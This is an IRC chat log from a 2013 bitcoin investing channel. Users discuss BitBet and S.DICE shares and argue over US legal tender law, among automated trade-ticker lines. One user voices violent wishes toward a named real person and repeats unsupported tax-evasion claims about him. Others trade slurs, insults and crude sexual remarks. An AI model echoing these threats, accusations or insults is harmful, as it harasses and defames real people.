games Jun 22 19:59:37 gambling? Jun 22 19:59:42 not necessarily. Jun 22 20:00:10 are any projects currently being worked on Jun 22 20:00:30 well currently a tech lead was retained, and a mmorpg is being developed Jun 22 20:00:58 there's a splashscreen competition to hire art talent, and some announcements slated for later on (game engine etc) Jun 22 20:01:03 im also an investor in bitbet Jun 22 20:01:12 any forward statements to this months profits Jun 22 20:01:31 or guesses? Jun 22 20:02:05 afaik bitbet doesn't make interterm statements. Jun 22 20:02:23 no talking during teh sex Jun 22 20:02:49 does mr voorhees come in here? Jun 22 20:02:59 asshole ruined sdice with his ban on US players Jun 22 20:03:13 mostly he comes on shareholders faces Jun 22 20:03:21 ;;seen evoorhees Jun 22 20:03:22 want him to buy my shares back from me Jun 22 20:03:30 why would he do that? Jun 22 20:03:32 occasionally Jun 22 20:03:57 he trashed the website by killing its competitive edge ie US players Jun 22 20:04:28 you are always free to sell your shares Jun 22 20:04:31 whats the point of bitcoin gambling if it has the same regulations as dollar gambling Jun 22 20:04:39 it doesnt Jun 22 20:04:45 US players can still bet Jun 22 20:04:52 there is IP bans no? Jun 22 20:04:55 just some are too dumb to realize Jun 22 20:05:03 by doing what using stupid tor? Jun 22 20:05:11 using stupid bitcoin Jun 22 20:05:17 I'm still waiting for TAT to put up a S.MG PT. Jun 22 20:05:20 bitcoin allowed censored players to play Jun 22 20:05:29 Furuknap I intended to Jun 22 20:05:35 but no divs = no sales Jun 22 20:05:38 so i didnt Jun 22 20:05:44 thickasthieves new US players cant see the site? or can they Jun 22 20:05:47 I would buy... Jun 22 20:06:01 why not buy from mpex Jun 22 20:06:03 Didivends be damned. A startup shouldn't be issuing dividends. Jun 22 20:06:26 Well, I can't be bothered to pay 30BTC for trade perhaps 10BTC. Jun 22 20:06:36 935, there are much worse problems with sdice than hiding website from US Ips Jun 22 20:06:42 i want voorhees to buy back my shares after he trashed their value by imposing dollar regulations on his website Jun 22 20:06:55 furuknap > coinbr.com Jun 22 20:06:57 and being a liar and a thief for talking up libertarian values while not practicing them Jun 22 20:07:08 I could to CoinBR, but I simply haven't had the inclination yet, and I don't feel like paying a monthly fee on holding assets. Jun 22 20:07:08 bitcoin935 you know that angle prolly work a lot better on the forum than here. Jun 22 20:07:16 here people kinda have a clue. Jun 22 20:07:19 it wont work their either Jun 22 20:07:22 mircea_popescu im just upset about it. Jun 22 20:07:27 that i can see. Jun 22 20:07:30 Nicky Santoro: I think in all fairness, I should explain to you exactly what it is that I do. For instance tomorrow morning I'll get up nice and early, take a walk down over to the bank and... walk in and see and, uh... if you don't have my money for me, I'll... crack your fuckin' head wide-open in front of everybody in the bank. And just about the time that I'm comin' out of jail, hopefully, you'll be coming out of yo Jun 22 20:07:30 ur coma. And guess what? I'll split your fuckin' head open again. 'Cause I'm fuckin' stupid. I don't give a fuck about jail. That's my business. That's what I do. Jun 22 20:07:32 but still a preferred venue Jun 22 20:08:00 well id like to crack voorhees head open Jun 22 20:08:08 will bitbet ever impose US bans ? Jun 22 20:08:32 now that i don't know. Jun 22 20:08:52 im getting really sick and tired of people in this scene saying one thing and doing another Jun 22 20:09:13 bitcoin935: If you're angry about losing money, you probably will lose more. Jun 22 20:09:23 voorhees said he was praciticing libertarian values whatever those even are, and then bans the largest gambling population on the planet without telling anyone Jun 22 20:10:01 well, that's a point. Jun 22 20:10:02 given the way bitbet works, how would a hypothetical IP ban matter? Isn't everyone using TOR/proxies/etc. anyway? Jun 22 20:10:25 asciilifeform: many people do not use or care to use those Jun 22 20:10:31 asciilifeform no idea tbh. kakobrekla doesn't know how to configure log packages so we have none Jun 22 20:10:34 just want some entertainment Jun 22 20:10:51 bitcoin935 you can at least rest easy that i don't say one thing and do another. Jun 22 20:10:56 i just don't say. feel better ? Jun 22 20:11:30 i feel ok about bitbet but im really pissed off about that pencil necked coward voorhees Jun 22 20:11:44 lol Jun 22 20:12:21 sell your shares Jun 22 20:12:26 youll feel better Jun 22 20:12:28 he killed the bids Jun 22 20:12:39 sell at a loss then Jun 22 20:12:39 by thrashing future revenues Jun 22 20:12:53 is site throughput actually down ? Jun 22 20:12:58 voorhees can pay me for my shares im even considering flying out to panama where violence is a way of life Jun 22 20:13:00 yes Jun 22 20:13:18 Dammit! I CAN HAS BTCT! Jun 22 20:13:35 you dont just ban your largest customers for no reason at all Jun 22 20:13:43 listen for greater good of all assets, this notion of issuer buying back shares needs to die Jun 22 20:13:48 Well, apparently he did. Jun 22 20:13:48 it's idiotic Jun 22 20:13:54 no it isnt Jun 22 20:14:11 at least mircea isnt a coward Jun 22 20:14:13 the only buyback that will happen Jun 22 20:14:28 is under any buyback clause in the prospectus Jun 22 20:14:31 how often is mr voorhees in here? Jun 22 20:14:33 So, MP will cover my losses if I buy S.MPOE and lose money? Cool! Jun 22 20:14:40 right? Jun 22 20:14:42 MP is out in the open Jun 22 20:14:42 no, but i'll shoot you. Jun 22 20:14:50 :-D Jun 22 20:14:53 so you get something for your loss. Jun 22 20:14:55 thats whats so great about bitcoin Jun 22 20:14:58 zero risk! Jun 22 20:14:59 At least the buyback won't bother me for long. Jun 22 20:15:26 thickasthieves: voorhees was out full force touting his libertarian ideas Jun 22 20:15:26 Besides, you'll miss anyway, by your own admission. Jun 22 20:15:28 bitcoin935 drops by occasionally, but i dunno. week ? month ? Jun 22 20:15:28 and then acts worse then a government Jun 22 20:15:48 personally i blame the conferences. Jun 22 20:15:56 buncha retards get together, discuss as if they have a clue Jun 22 20:16:01 agreed Jun 22 20:16:07 scare each other out like kids at the pijama party. Jun 22 20:16:28 tjhat recent link re the bitcoin scamdation giving its valuiable opinions is a point in case. Jun 22 20:16:51 [HAVELOCK] [ASICM] 27 @ 0.030977 = 0.8364 BTC [+] Jun 22 20:16:54 [HAVELOCK] [ASICM] 1 @ 0.030978 BTC [+] Jun 22 20:16:56 i dont get why these people couldnt keep their mouths shut, nobody was looking at bitcoin on the part of the government but these assholes kept playing with a hornets nest Jun 22 20:16:58 [HAVELOCK] [ASICM] 4 @ 0.03098 = 0.1239 BTC [+] Jun 22 20:17:04 [HAVELOCK] [ASICM] 63 @ 0.030999 = 1.9529 BTC [+] Jun 22 20:17:41 big jerks, the lot of em Jun 22 20:18:09 why go looking for trouble. bitcoin was ignored by government until these bafoons kept instigating problems Jun 22 20:18:34 and US online gambling applies only to actual currencies Jun 22 20:18:43 shoot first, do time later, I always say Jun 22 20:18:53 infact if you read the law it says you arent allowed to use credit cards Jun 22 20:18:59 theres no actual outright ban Jun 22 20:19:19 bitcoin935 look. it's not practical to pick a course and follow it. this isn't the outfit. Jun 22 20:19:28 it's an open project, people will flail about in all directions. Jun 22 20:19:30 whadda ya want. Jun 22 20:19:52 he wants it to flail in the cirection that most benefits him above anyone else Jun 22 20:19:58 can you blame him? Jun 22 20:20:15 direction* Jun 22 20:20:17 i thought it was more of an ideological objection Jun 22 20:20:20 no i just believe in oldfashioned integrity Jun 22 20:20:44 voorhees was openly discussing his libertarian bs and then does the complete opposite Jun 22 20:20:45 nothing Jun 22 20:20:52 Problem with that is that only one person can crack Erik's head open, so all the others would be left cheated by the first person, wanting to crack that person's head open. Jun 22 20:21:14 well they could have a crackbang Jun 22 20:21:19 US gambling laws simply state banks and credit cards are not allowed to transmit funds directly to gaming sites Jun 22 20:21:25 there is no ban on online gambling Jun 22 20:21:25 mostly upset investing isnt zero-risk Jun 22 20:21:46 thickasthieves i was prepared to take all "event" risk Jun 22 20:22:03 but not the management doing the opposite of what they say Jun 22 20:22:24 such an unlikely risk, management failing Jun 22 20:22:33 it didnt fail. Jun 22 20:22:43 voorhees went against his own word and so called believes Jun 22 20:22:51 becuase he was a tax evader in the US is his own problem Jun 22 20:23:02 it's still in the process of failing, true Jun 22 20:23:15 sems it was your problem to Jun 22 20:23:16 o Jun 22 20:23:42 wait what ? Jun 22 20:23:50 if bitcoin935 says so, it is so Jun 22 20:24:05 does bitcoin935 have some proof of this saying of his ? Jun 22 20:24:12 his word isnt enough? Jun 22 20:24:19 well proof always helps. Jun 22 20:24:21 chaang tax issue? Jun 22 20:24:23 he is a man of integrity remember? Jun 22 20:24:43 chaang: my problem was erik voorhees cutting off the largest customer base for SDICE. US customers Jun 22 20:24:51 wait wait. nobody cares why goat had to move to vietnam or /we Jun 22 20:25:00 i thought you meant erik. Jun 22 20:25:07 chaang-noi: no im talking about something else Jun 22 20:25:27 chaang-noi: erik vorhees talks about being a libertarian and then cuts off the largest customer base for no reason or without consultation Jun 22 20:25:37 yes Jun 22 20:25:46 which is against what the man says Jun 22 20:26:08 and from a legal perspective US players are allowed to gamble online, just banks and credit card companies are not allowed to transmit funds directly to sites Jun 22 20:26:17 sdice is hurting not because US blockage Jun 22 20:26:22 it was hurting well before that Jun 22 20:26:33 it is dying because it was not growing Jun 22 20:27:00 it was becoming less and less relevant even before they expedited the process Jun 22 20:27:35 well there was going to be a site upgrade Jun 22 20:27:38 voorhess is spending his time evading taxes instead of advertising sdice Jun 22 20:28:10 yes Jun 22 20:28:29 they also design a nice new logo and Anti-US graphic Jun 22 20:28:38 chaang-noi: try to get more? Jun 22 20:29:03 voorhees was publicaly announcing his tax evasion as well Jun 22 20:29:14 why would he be doing that Jun 22 20:29:21 couldnt he keep it to himself? Jun 22 20:29:44 10 million is a joke and a half Jun 22 20:30:04 he could have been making 500-1mil a month Jun 22 20:30:15 i have money becuase i do not like losing. Jun 22 20:30:22 and people that brag about their wealth tend not to have any Jun 22 20:30:37 voorhees can buy back my shares Jun 22 20:30:48 im glad hes in panama where cops dont exist Jun 22 20:31:03 what the fuck have i missed out on here. Jun 22 20:31:12 what tax evasion, what advertising, wehat publicly already. Jun 22 20:31:32 chaang noi yea you have 4million of paper gains. Jun 22 20:31:44 big deal so do a huge ammount of adopters Jun 22 20:31:58 you are measuring in fiat. Jun 22 20:32:11 bitcoin935: The forums are over there -----------> Jun 22 20:32:20 saying i have 4 million means you have 4 million of cash Jun 22 20:32:53 your only worth what you can write a check /produce cash for. Jun 22 20:33:41 thanks Jun 22 20:34:18 that isnt cash Jun 22 20:34:49 you cant spend them Jun 22 20:34:54 "Matter of fact, nobody knew all the details. But it should have been perfect. I mean he had me, Nicky Santoro, his best friend watching his ass. And he had Ginger, the woman he loved on his arm. But in the end, we fucked it all up. It should have been so sweet, too. But it turned out to be the last time that street guys like us were ever given anything that fuckin' valuable again." Jun 22 20:35:06 mircea obsessed with casino? Jun 22 20:35:20 go try Jun 22 20:35:32 not a bad movie. Jun 22 20:35:38 better then goodfellas Jun 22 20:35:48 yeah, prolly. Jun 22 20:35:57 chaang-noi: go take your gold coin and try to spend it at walmart Jun 22 20:36:04 you can explain to them what legal tender means Jun 22 20:36:42 Go take your Euro and try spending it on Wallmart. Jun 22 20:37:22 can you quote the specific law Jun 22 20:37:32 where private business/individuals must take something? Jun 22 20:37:47 there are no federal laws in the united states forcing you to use legal tender. Jun 22 20:37:54 so try again. Jun 22 20:38:26 locate the law please Jun 22 20:38:59 convenience stores and gas stations for example wont take 50 and 100 dollar bills Jun 22 20:39:25 no they wouldnt Jun 22 20:39:30 there is NO federal statue or LAW Jun 22 20:39:36 requiring a private business to accept Jun 22 20:39:43 http://www.treasury.gov/resource-center/faqs/Currency/Pages/legal-tender.aspx Jun 22 20:39:48 please read this and shut the fuck up. Jun 22 20:39:49 Untitled 1 Jun 22 20:40:02 no its never needed to be accepted. Jun 22 20:40:14 hey tiberiusiv Jun 22 20:40:25 if you borrow gold and your contract expects gold repayment Jun 22 20:40:33 the debt is settled in gold Jun 22 20:40:42 http://www.treasury.gov/resource-center/faqs/Currency/Pages/legal-tender.aspx Jun 22 20:40:44 Untitled 1 Jun 22 20:40:46 produce mee the law please Jun 22 20:40:57 Private businesses are free to develop their own policies on whether or not to accept cash unless there is a State law which says otherwise. Jun 22 20:41:26 there is no federal law in the united states requiring you to use or accept fiat money. Jun 22 20:41:35 change the subject? Jun 22 20:41:55 the government accepts their credit money for tax purposes Jun 22 20:42:05 there is no requirement for you to accept it at your place of business Jun 22 20:42:10 or to write debts in it Jun 22 20:42:20 go spend your gold in walmart Jun 22 20:42:52 There is, however, no Federal statute mandating that a private business, a person or an organization must accept currency or coins as for payment for goods and/or services. Private businesses are free to develop their own policies on whether or not to accept cash unless there is a State law which says otherwise. For example, a bus line may prohibit payment of fares in pennies or dollar bills. In addition, movie theaters, co Jun 22 20:43:20 For example, a bus line may prohibit payment of fares in pennies or dollar bills. In addition, movie theaters, convenience stores and gas stations may refuse to accept large denomination currency (usually notes above $20) as a matter of policy. Jun 22 20:43:41 yea go take them to court. Jun 22 20:44:00 voorhees is going to get whats coming to him Jun 22 20:44:10 sdice is not a legal corporation to use a court Jun 22 20:44:13 its the wild west. Jun 22 20:44:18 reputation matters Jun 22 20:44:33 are you hurt you dont know what you are talking about? Jun 22 20:46:01 never made a single threat Jun 22 20:46:09 but please continue looking like an idiot Jun 22 20:46:16 spending gold coins in walmart lol Jun 22 20:46:38 yea you can quote them court laws Jun 22 20:47:26 seeing you are an expert on the subject. Jun 22 20:47:42 no just an idiot. Jun 22 20:48:01 bring your gold eagles to walmart please and tell them they have to accept it by law Jun 22 20:48:08 lol. Jun 22 20:49:06 19:10.29 ( mircea_popescu ) asciilifeform no idea tbh. kakobrekla doesn't know how to configure log packages so we have none Jun 22 20:49:07 lies Jun 22 20:49:45 europe has mandatory legal tender laws Jun 22 20:49:54 the US does not contrary to popular myth Jun 22 20:51:44 plenty of laws in europe that require the useage and acceptance of national currency Jun 22 20:51:48 kakobrekla lol Jun 22 20:52:14 chaang why are you still speaking after being discredited? Jun 22 20:52:16 bitcoin935 that's actually a great thing, because it will prevent "cashless" ie, fictitious economuies in the eu Jun 22 20:52:25 [HAVELOCK] [ASICM] 1 @ 0.030101 BTC [-] Jun 22 20:53:10 well europe has a large and developed black market in many of its countries i think thats whats keeping cash still popular Jun 22 20:53:12 Chaang-Noi expect better what Jun 22 20:53:52 WTB S.DICE shares Jun 22 20:53:57 the primary reason people accept government money is because its needed to pay taxes in and 2 old habits die hard Jun 22 20:54:22 and also business's and households tend to have debts that are settled in government paper Jun 22 20:54:22 unlikely Jun 22 20:54:52 people use cash because they wanna buy stuff Jun 22 20:55:04 im talking about acceptance. Jun 22 20:55:24 there's no "hmm i really need some cash, with all these gov obligations coming in!" Jun 22 20:55:33 2 things give the largest bids to government fiat, debt repayment demand and government tax obligations Jun 22 20:55:53 people constantly need it to repay debts Jun 22 20:56:18 i am paying like 1 debt per minute currently Jun 22 20:56:27 constant Jun 22 20:56:36 chaang youve been discredited please stay silent. Jun 22 20:56:54 have fun taking a bath on your silver/gold Jun 22 20:57:59 so what should we do? Jun 22 20:58:07 about all this Jun 22 20:58:20 silver is down what 70% in the last 2 years? Jun 22 20:58:57 silver will be in single digits before its ever back to 50 Jun 22 20:59:11 your the one holding silver not me lol Jun 22 20:59:50 silver is about 90% below its 80's highs thats 30 years ago. Jun 22 21:00:14 chaang noi your gold is doing great too Jun 22 21:00:28 yea the high was $50 Jun 22 21:00:32 in 80's dollars Jun 22 21:00:36 [HAVELOCK] [ASICM] 10 @ 0.0311 = 0.311 BTC [+] Jun 22 21:00:43 [HAVELOCK] [ASICM] 95 @ 0.03119999 = 2.964 BTC [+] Jun 22 21:00:44 inflation adjusted silver has lost 90% Jun 22 21:00:51 it was a good buy for $2 Jun 22 21:00:52 [HAVELOCK] [ASICM] 139 @ 0.0312 = 4.3368 BTC [+] Jun 22 21:00:58 to flip to the idiots at double digits Jun 22 21:01:05 [HAVELOCK] [ASICM] 24 @ 0.0313 = 0.7512 BTC [+] Jun 22 21:01:08 only silver is subject to inflation Jun 22 21:01:08 chaang noi you bought in the last 5 years Jun 22 21:01:11 keep that in mind Jun 22 21:01:19 other dollars are safe Jun 22 21:01:23 [HAVELOCK] [ASICM] 24 @ 0.031378 = 0.7531 BTC [+] Jun 22 21:01:34 thickasthieves: silver has lost 99.99% of its value for the last 1000 years Jun 22 21:01:37 so yes it does inflate Jun 22 21:01:48 lol sure you did Jun 22 21:02:08 yea after the fact its easy to say it Jun 22 21:02:14 0 documented proof Jun 22 21:02:38 chaang noi judging by your picture you are a stupid kid Jun 22 21:03:04 gold/silver bug no surprise. Jun 22 21:03:18 yea rich in asia Jun 22 21:03:21 poor everywhere else Jun 22 21:03:33 3rd world? Jun 22 21:03:36 agreed Jun 22 21:04:05 mhmm Jun 22 21:04:17 angry at being discredited Jun 22 21:04:32 next thing youll do is try and explain to me how the monetary system works Jun 22 21:04:33 lol Jun 22 21:04:47 chaang youve been discredited go enjoy the beer Jun 22 21:04:52 you deserve it Jun 22 21:05:04 your mom is so fat Jun 22 21:05:33 your a joke Jun 22 21:05:38 you insulted yourself Jun 22 21:05:46 i didnt have to say anything Jun 22 21:05:52 soon as you said walmart has to take your gold coins Jun 22 21:05:57 you made a fool of yourself Jun 22 21:06:01 so run along baller Jun 22 21:06:40 your probably the local white guy libertarian saving the world from fiat money in asia Jun 22 21:07:08 guess i 'm gonna have to put my ignore button to use again Jun 22 21:07:12 this is retarded Jun 22 21:07:21 I'm enjoying it so far Jun 22 21:07:23 i only see the new kid and it's kinda funny. Jun 22 21:07:24 walmart gold Jun 22 21:15:26 chaang-noi: leave. Jun 22 21:15:35 dont embarass yourself further Jun 22 21:16:40 How did chaang embarass himself? Jun 22 21:16:57 said the US has laws forcing you to use its money Jun 22 21:17:01 no, oh god no... you'll make it worse Jun 22 21:17:17 namworld forget it. Jun 22 21:17:46 I wouldn't say force it... Jun 22 21:18:30 chaang noi thought he could go to walmart with his legal tender gold coin and they have to accep it for payment. Jun 22 21:18:45 after i proved that isnt the case he got upset and started freaking out on how rich he is Jun 22 21:19:06 no that was never said. you said they are forced to accept your gold Jun 22 21:19:27 there are no legal tender laws forcing private business or individuals Jun 22 21:19:30 to accept it Jun 22 21:19:38 Well no shop is technically forced to accept the legal tender. Jun 22 21:19:46 exactly namworld Jun 22 21:20:05 wrong. Jun 22 21:20:08 If there's a debt, yes, they're forced to accept it if that's what you offer. Jun 22 21:20:22 namworld thats wrong. Jun 22 21:20:30 the debt has to be denominated in dollars Jun 22 21:20:36 it can be denominated in anything on the contract. Jun 22 21:20:56 there is NOBODY that has to accept your government fiat Jun 22 21:21:08 unless the CONTRACT you made specifies payment Jun 22 21:21:14 in fiat. Jun 22 21:21:18 do you understand that difference? Jun 22 21:21:23 Chaang-Noi: said $100 gold coin is worth several thousand dollars in gold though ;) Jun 22 21:21:33 if you made a contract that you owe someone a GOAT Jun 22 21:21:38 you are obliged to deliver a goat Jun 22 21:21:40 bitcoin935: as per US federal law, yes, they must accept cash. Jun 22 21:21:49 there is no law like that diablo Jun 22 21:21:53 If it's debt and that's all you got to offer, they have to accept the cash Jun 22 21:21:56 they do not have to accept cash Jun 22 21:22:00 namworld wrong. Jun 22 21:22:06 Chaang-Noi: they do not have to accept it at spot value, only face value Jun 22 21:22:13 Chaang-Noi: US gold face value is waaaaaaaaaaaaaay below spot value Jun 22 21:22:20 http://www.treasury.gov/resource-center/faqs/Currency/Pages/legal-tender.aspx Jun 22 21:22:22 wtf? Jun 22 21:22:22 Untitled 1 Jun 22 21:22:34 This statute means that all United States money as identified above are a valid and legal offer of payment for debts when tendered to a creditor. There is, however, no Federal statute mandating that a private business, a person or an organization must accept currency or coins as for payment for goods and/or services. Private businesses are free to develop their own policies on whether or not to accept cash unless there is a Jun 22 21:22:43 bitcoin935 as well Jun 22 21:22:45 There is, however, no Federal statute mandating that a private business, a person or an organization must accept currency or coins as for payment for goods and/or services. Private businesses are free to develop their own policies on whether or not to accept cash unless there is a State law which says otherwise. For example, a bus line may prohibit payment of fares in pennies or dollar bills. In addition, movie theaters, co Jun 22 21:22:50 not it any mood to deal with trolls today Jun 22 21:22:56 Private businesses are free to develop their own policies on whether or not to accept cash unless there is a State law which says otherwise. For example, a bus line may prohibit payment of fares in pennies or dollar bills. In addition, movie theaters, convenience stores and gas stations may refuse to accept large denomination currency (usually notes above $20) as a matter of policy. Jun 22 21:23:07 diablo-d3: state fact next time not your retarded myths. Jun 22 21:23:17 nobody has to accept cash in the united states for anything. Jun 22 21:23:25 there is NO federal law requiring it Jun 22 21:23:36 There is, however, no Federal statute mandating that a private business, a person or an organization must accept currency or coins as for payment for GOODS AND/OR SERVICES. Jun 22 21:23:42 yes Jun 22 21:23:50 Does not say about debt. Jun 22 21:23:50 and DEBTS have to be written on the CONTRACT Jun 22 21:23:58 what the debt is denominated in Jun 22 21:24:06 go spew your ayn rand masturbation shit elsewhere. Jun 22 21:24:14 diablo fuck off monkey Jun 22 21:24:19 go make up laws like you libertards all do Jun 22 21:24:36 namworld you keep your filthy french canadian mouth shut too Jun 22 21:24:44 fking loser selling VPNs for 2 dollars Jun 22 21:24:57 wow.. this escalated. Jun 22 21:25:04 all 3 on ignore. Jun 22 21:25:15 I think Chaang-Noi needs to get a clue Jun 22 21:25:24 he really should know better not to piss me off Jun 22 21:25:32 when I put people on ignore, it is usually permanent Jun 22 21:25:32 hes a loser Jun 22 21:26:16 hi Jun 22 21:26:22 Hi Anduck Jun 22 21:27:04 i'm fine!! coding and stuff Jun 22 21:27:11 we just had a midsummer celebration yesterday Jun 22 21:27:19 it's a tradition in northern countries Jun 22 21:27:34 that indeed! =) Jun 22 21:27:45 the moon is always same size Jun 22 21:27:52 lol Jun 22 21:27:54 Yeah, someone said it was falling down based on extrapolating the last few days or orbital decline. Jun 22 21:28:03 *of Jun 22 21:28:03 well, how are things going? Jun 22 21:28:26 well that was uncalled for. Jun 22 21:28:45 lol Jun 22 21:28:46 Chaang-Noi 100 million yoears you were nothing at all Jun 22 21:29:02 kakobrekla how much bitbet.us makes profit in a month? Jun 22 21:29:05 is it public info? Jun 22 21:29:06 Goat, it was far longer than 100 million years :-) Jun 22 21:29:30 Anduck there are monthly statements on trilema Jun 22 21:29:41 i dont like trilema. Jun 22 21:29:43 :I Jun 22 21:29:52 well i'll check it, thx kako Jun 22 21:30:31 A mars-sized planet crashed into the earth, and the debris formed the moon. At least that's the current theory. It was far earlier than 100m years ago, though. I mean, creatures lived here at that time... Jun 22 21:31:06 The Moon is thought to have formed nearly 4.5 billion years ago, not long after the Earth. Although there have been several hypotheses for its origin in the past, the current most widely accepted explanation is that the Moon formed from the debris left over after a giant impact between Earth and a Mars-sized body. Jun 22 21:31:09 http://en.wikipedia.org/wiki/Moon Jun 22 21:31:16 yea that is estated to have happened about .5 billion years after teh earth started to form Jun 22 21:31:20 so 4 billion years ago Jun 22 21:31:28 any news from burnside on BTCT? Jun 22 21:31:46 Anduck https://bitcointalk.org/index.php?topic=141458.0 Jun 22 21:31:52 I tried emailing him to offer help on calming the raging horde, but no word yet. Jun 22 21:31:58 it has been down for 6+ hours Jun 22 21:32:03 ty kakobrekla Jun 22 21:32:07 Chaany-noi, meh, mistakes happen. As long as the right information is eventually found Jun 22 21:32:47 Chaang-Noi: is there an issue?? Yes. It's been down for a while now. Jun 22 21:33:27 https://bitcointalk.org/index.php?topic=125629 would probably be the first place to get updates. Nothing there so far, though. Jun 22 21:33:35 Same goes for LTC Global, though. Jun 22 21:33:36 [BTC-TC] Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jun 22 21:33:50 furuknap: yep - though nothing to be found Jun 22 21:34:00 hence checking if he had been in here Jun 22 21:34:13 I haven't seen burnside on, but i've only been on for 45 minutes. Jun 22 21:38:06 yea at least 5 hours it's been down. I've been trying since i woke up this morning. Haven't seen anything official posted on bitcointalk. But I haven't checked it in over an hour now. So I'm waiting Jun 22 21:48:33 http://trilema.com/2013/how-to-cancel-your-bitbet-bet/ Jun 22 21:48:46 kakobrekla i'm shocked nobody figured that out by now. Jun 22 21:48:58 How to cancel your BitBet bet. pe Trilema - Un blog de Mircea Popescu. Jun 22 21:50:07 [BTC-TC] Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jun 22 21:51:57 yay I'm in Jun 22 21:52:03 sites back Jun 22 21:56:55 CHaang-Noi: how much *does* it cost to fuck a virgin? Jun 22 21:57:44 kakobrekla how much bitbet.us makes profit in a month? http://trilema.com/bitbet-may-2013-statement Jun 22 21:57:48 each month is reported. Jun 22 21:58:22 do you use windows? Jun 22 21:58:28 also thanks for the link! Jun 22 21:58:29 I ready mircea_popescu's last comment as a answer to benkay. Jun 22 21:58:45 nope Jun 22 21:58:56 yea no, i got that a few seconds later. Jun 22 21:59:15 but mircea_popescu hey do you use windows? Jun 22 21:59:23 ... you use mac. Jun 22 21:59:29 95% sure Jun 22 21:59:35 is gpg signing easy with it? Jun 22 21:59:50 can you use a command line, anduck? Jun 22 21:59:55 of course i can Jun 22 22:00:01 so wtf Jun 22 22:00:13 wtf wtf? Jun 22 22:00:15 same tools on all platforms Jun 22 22:00:25 yes! but it'd be easier with real gui Jun 22 22:00:35 fyi i do use linux Jun 22 22:00:37 the perrenial noise... Jun 22 22:00:39 i use linux Jun 22 22:00:43 perennial* Jun 22 22:01:02 http://bitbet.us/bet/401/price-of-bitcoin-mtgox-to-be/ Jun 22 22:01:14 is this a bet on the rate of btc or the fucked-up-ed-ness of gox? Jun 22 22:01:20 BitBet - Price of Bitcoin MtGox to be >= $1000 Before End of July 2013 Jun 22 22:01:32 nobody knows. Jun 22 22:01:38 rhetorical question. Jun 22 22:02:22 mircea_popescu does bitbet publish rejected bets? Jun 22 22:02:47 not atm Jun 22 22:03:03 bawww Jun 22 22:03:07 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.004501 = 0.2205 BTC [-] Jun 22 22:03:12 BTCT back. Jun 22 22:03:47 btw mircea_popescu, it might be neat to have a link in the bitbet faq to your post on cancelling a bet Jun 22 22:04:17 how does that compare to a skilled whore, Chaang-Noi? Jun 22 22:04:23 benkay mebbe yea Jun 22 22:04:25 on cost and quality metrics? Jun 22 22:04:35 to me it's mind boggling thisd isn't self obvious tho. but i guess it'll go there Jun 22 22:05:01 https://bitcointalk.org/index.php?topic=125629.msg2551320#msg2551320 <--- status update about btct.co if anyones interested Jun 22 22:05:05 [BTC-TC] Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Jun 22 22:05:16 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.0045 = 0.0765 BTC [-] Jun 22 22:06:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.0313 = 0.0626 BTC [-] Jun 22 22:06:30 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.0045 = 0.0405 BTC [-] Jun 22 22:07:15 [HAVELOCK] [ASICM] 1 @ 0.031377 BTC [-] Jun 22 22:07:29 mircea_popescu: are you able to discuss the strategic investor in mpoe? Jun 22 22:07:45 "able" Jun 22 22:07:56 read about it on your blog Jun 22 22:08:04 that's abouyt all there is. Jun 22 22:08:16 on bitcointalk some users have a "ignore" button of a different background color. anyone know why? Jun 22 22:08:39 [BTCTC] [S.DICE-PT] 1 @ 0.002719 BTC [+] Jun 22 22:08:45 [BTCTC] [DMS.MINING] 2 @ 0.0165 = 0.033 BTC [+] Jun 22 22:08:55 wow Jun 22 22:08:58 so which users do i have to ignore here besides chaang-noi Jun 22 22:09:01 I love this Jun 22 22:09:08 best feature ever Jun 22 22:09:13 [HAVELOCK] [ASICM] 1 @ 0.031377 BTC [-] Jun 22 22:09:16 anyone recommend a list ? Jun 22 22:09:18 [BTCTC] [S.DICE-PT] 2 @ 0.002719 = 0.0054 BTC [+] Jun 22 22:10:02 I'd start with anyone with a random nick and using the web client like bitcoin935 Jun 22 22:12:55 there are zero prism bets... Jun 22 22:13:13 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jun 22 22:13:17 benkay, what do you want to bet on that deals with Prism? Jun 22 22:13:27 i read on those forums that chaang noi was banned before lol no surprise Jun 22 22:13:36 anyone that calls themselves "goat" should be bannd Jun 22 22:13:47 psychoron i'm exploring the bet space Jun 22 22:14:11 mp noted bitbet's a good way to make money on your smarts (which I think I have) instead of your capital (which I don't) Jun 22 22:14:18 so i'm exploring the betspace Jun 22 22:14:36 considering trolling the hackernews conspiracy theorists into some bets Jun 22 22:14:43 [BTCTC] [BITVPS] 6 @ 0.001419 = 0.0085 BTC [+] Jun 22 22:15:09 as long asd they can be actually verified. Jun 22 22:15:14 *nod* Jun 22 22:15:34 theres also no open bets on Brazil or Turkey. I would have liked to been able to bet on political upheaval Jun 22 22:15:48 yup. Jun 22 22:15:57 bitbet's my new fave Jun 22 22:16:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0042 BTC [-] Jun 22 22:16:46 hey mircea_popescu how does bitbet address the assasination market thing? Jun 22 22:17:01 well read the faq neh ? Jun 22 22:17:23 hrrrrr Jun 22 22:18:14 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.00408 = 0.0816 BTC [-] Jun 22 22:19:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00408 BTC [-] Jun 22 22:20:58 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00403 BTC [-] Jun 22 22:21:20 who is theymos Jun 22 22:21:32 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.004021 = 0.0643 BTC [-] Jun 22 22:21:40 forum admin Jun 22 22:21:46 [BTCTC] [PAJKA.BOND] 1 @ 0.049 BTC [+] Jun 22 22:22:13 benkay you seem like you lack both smarts and capital to be honest. but yes bitbet is the better of the bitcoin gambling sites Jun 22 22:22:25 [BTCTC] [TAT.VIRTUALMINE] 84 @ 0.004021 = 0.3378 BTC [-] Jun 22 22:22:27 [BTCTC] [TAT.VIRTUALMINE] 235 @ 0.004021 = 0.9449 BTC [-] Jun 22 22:22:59 [HAVELOCK] [ASICM] 28 @ 0.031377 = 0.8786 BTC [-] Jun 22 22:23:20 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC 